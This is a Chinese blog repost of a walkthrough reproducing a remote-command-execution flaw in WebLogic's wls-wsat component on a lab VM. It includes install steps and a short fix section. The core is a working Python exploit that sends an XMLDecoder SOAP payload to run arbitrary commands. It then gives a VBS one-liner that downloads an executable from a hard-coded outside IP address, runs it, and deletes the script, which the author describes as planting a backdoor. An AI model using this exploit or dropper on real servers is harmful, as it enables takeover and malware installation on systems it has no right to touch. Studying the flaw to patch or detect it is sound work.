复现WebLogic最新漏洞(WLS组件)

栏目: Java · 发布时间: 6年前

内容简介:复现WebLogic最新漏洞(WLS组件)

WebLogic又爆大漏洞了,之前有一个 java 反序列化的漏洞,通杀所有WebLogic,现在wls组件又出问题了,漏洞根源像是xxe,这次我来复现整个漏洞。我在虚拟机上安装WebLogic,做为靶机,我的xp系统作为攻击机。

1.准备环境

1.1  WebLogic 安装包

下载地址: http://download.oracle.com/otn/nt/middleware/11g/wls/1036/oepe-wls-indigo-installer-11.1.1.8.0.201110211138-10.3.6-win32.exe

1.2 WebLogic wls 漏洞POC

2.安装WebLogic

在虚拟机中运行oepe-wls-indigo-installer-11.1.1.8.0.201110211138-10.3.6-win32.exe,如图1

复现WebLogic最新漏洞(WLS组件) 图1

点击【下一步】,图2

复现WebLogic最新漏洞(WLS组件) 图2

保持默认,点击【下一步】按钮。如图3

复现WebLogic最新漏洞(WLS组件) 图3

把”我希望通过My Oracle Support 接收安全更新”的勾去掉。一路【下一步】到安装界面,如图4

复现WebLogic最新漏洞(WLS组件) 图4

等待一刻钟后,安装完成。如图5

复现WebLogic最新漏洞(WLS组件) 图5

点击”Getting Started with WebLogic Server@ 10.3.6”,出现配置界面,选择“创建域”,如图6

复现WebLogic最新漏洞(WLS组件) 图6

一路【下一步】,到这里勾上“启动管理服务器“,点击完成,如图7

复现WebLogic最新漏洞(WLS组件) 图7

启动WebLogic除了上面的图形界面,还可以直接运行startWebLogic.cmd,路径为

C:\Oracle\Middleware\user_projects\domains\base_domain\

现在WebLogic环境已经搭建好了,测试下wls组件是否正常,如图8

复现WebLogic最新漏洞(WLS组件) 图8

3.执行POC

我们的POC代码为

#! -*- coding:utf-8 -*-
import requests
 
url = "http://192.168.1.103:7001/wls-wsat/CoordinatorPortType"
xml = '''
    <soapenv:Envelope     xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
       <work:WorkContext    xmlns:work="http://bea.com/2004/06/soap/workarea/">
           <java      version="1.8" class="java.beans.XMLDecoder">
                <void     class="java.lang.ProcessBuilder">
                    <array    class="java.lang.String" length="3">
                        <void     index="0">
                            <string>cmd</string>
                        </void>
                        <void     index="1">
                            <string>/c</string>
                        </void>
                        <void     index="2">
                            <string>calc</string>
                        </void>
                    </array>
                <void     method="start"/></void>
           </java>
       </work:WorkContext>
   </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>
'''
r =requests.post(url,headers={'Content-Type':'text/xml','Cache-Control':'no-cache'},data=xml)
print r.status_code
  print r.text

在cmd中执行后,如图9是我的xp系统,图10 是虚拟机上的结果,可以看到弹出了计算器程序。

复现WebLogic最新漏洞(WLS组件) 图9

复现WebLogic最新漏洞(WLS组件) 图10

现在我们在目标机上写一个文本文件,修改POC中的calc为echo isafe>c:\aa.txt,我们成功的写入一个文件,如图11

复现WebLogic最新漏洞(WLS组件) 图11

现在我们执行的命令都成功了,只是没有回显功能,我们再实现一个下载器,也就是说下载一个EXE文件并运行。

4. Windows 上的文件下载脚本

在Windows上要执行下载文件功能,可以使用脚本,因为没有wget这个程序,一般我们可以使用vbs脚本或者powershell脚本。

我们主要测试vbs脚本,先看下面一段vbs代码

echo Set xPost = CreateObject("Microsoft.XMLHTTP") > hu.vbs&@echo xPost.Open "GET","http://122.23.134.27:30080/auto.exe",0 >> hu.vbs&@echo xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject("ADODB.Stream") >> hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo sGet.SaveToFile "auto.exe",2 >>hu.vbs&@cscript hu.vbs&@del hu.vbs&@start auto.exe

这段代码经过测试可以被WebLogic调用。这样就实现了一次攻击,可以植入一个后门。

5.漏洞修复

删除以下文件并重启WebLogic服务

rm-f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war

rm-f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war

rm-rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

*本文作者:河马安全网,转载请注明来自FreeBuf.COM


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

游戏测试精通

游戏测试精通

舒尔茨 / 周学毛 / 清华大学出版社 / 2007-9 / 48.00元

《游戏测试精通》来自3位在游戏测试领域都有着极其丰富经验的专业人员,是亚马逊“五星级”畅销书,也是国内第一本专业级游戏测试经典之作,不仅内容全面、实例丰富,而且讲解透彻、可读性强,并提供多个资源下载和技术支持站点。现如今,游戏产业发展迅猛,游戏测试已成为游戏产品、游戏软件、游戏程序设计与开发不可或缺的环节。《游戏测试精通》主要揭示了如何将软件测试的专业方法运用到游戏产业中,全面涵盖了游戏测试的基本......一起来看看 《游戏测试精通》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

HSV CMYK 转换工具
HSV CMYK 转换工具

HSV CMYK互换工具